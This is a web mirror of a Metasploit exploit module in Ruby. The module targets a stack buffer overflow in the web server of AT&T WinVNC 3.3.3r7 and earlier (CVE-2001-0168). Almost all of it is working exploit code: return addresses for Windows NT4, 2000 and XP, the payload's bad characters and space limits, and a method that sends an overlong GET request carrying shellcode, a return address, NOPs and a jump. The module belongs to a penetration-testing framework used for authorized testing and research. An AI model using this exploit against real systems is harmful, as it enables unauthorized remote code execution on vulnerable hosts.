Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/vnc/winvnc_http_get.rb
19515 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name'	=> 'WinVNC Web Server GET Overflow',

16
        'Description'	=> %q{

17
          This module exploits a buffer overflow in the AT&T WinVNC version

18
          <= v3.3.3r7 web server. When debugging mode with logging is

19
          enabled (non-default), an overly long GET request can overwrite

20
          the stack. This exploit does not work well with VNC payloads!

21
        },

22
        'Author' => 'aushack',

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'BID', '2306' ],

26
          [ 'OSVDB', '6280' ],

27
          [ 'CVE', '2001-0168' ],

28
        ],

29
        'Privileged'	=> true,

30
        'DefaultOptions' => {

31
          'EXITFUNC'	=> 'thread',

32
        },

33
        'Payload' => {

34
          'Space'	=> 979,

35
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x0b",

36
          'StackAdjustment' => -3500,

37
        },

38
        'Platform' => ['win'],

39
        'Targets' => [

40
          [ 'Windows NT4 SP3-6',	{ 'Ret' => 0x779f4e39 } ], # push esp, ret msvcrt.dll

41
          [ 'Windows 2000 SP1-4', { 'Ret' => 0x77bba3af } ], # jmp esp comctl32.dll

42
          [ 'Windows XP SP0-1',	{ 'Ret' => 0x71ab7bfb } ], # jmp esp ws2_32.dll

43
        ],

44
        'DisclosureDate' => '2001-01-29',

45
        'DefaultTarget' => 1,

46
        'Notes' => {

47
          'Reliability' => UNKNOWN_RELIABILITY,

48
          'Stability' => UNKNOWN_STABILITY,

49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

50
        }

51
      )

52
    )

53


54
    register_options(

55
      [

56
        Opt::RPORT(5800),

57
      ]

58
    )

59
  end

60


61
  def exploit

62
    sploit = '/' + payload.encoded + [target['Ret']].pack('V')

63
    sploit << make_nops(8) + Rex::Arch::X86.jmp(0xfffffc1c)

64


65
    res = send_request_raw({

66
      'uri' => sploit,

67
      'method' => 'GET',

68
    }, 5)

69


70
    handler

71
  end

72
end

73


74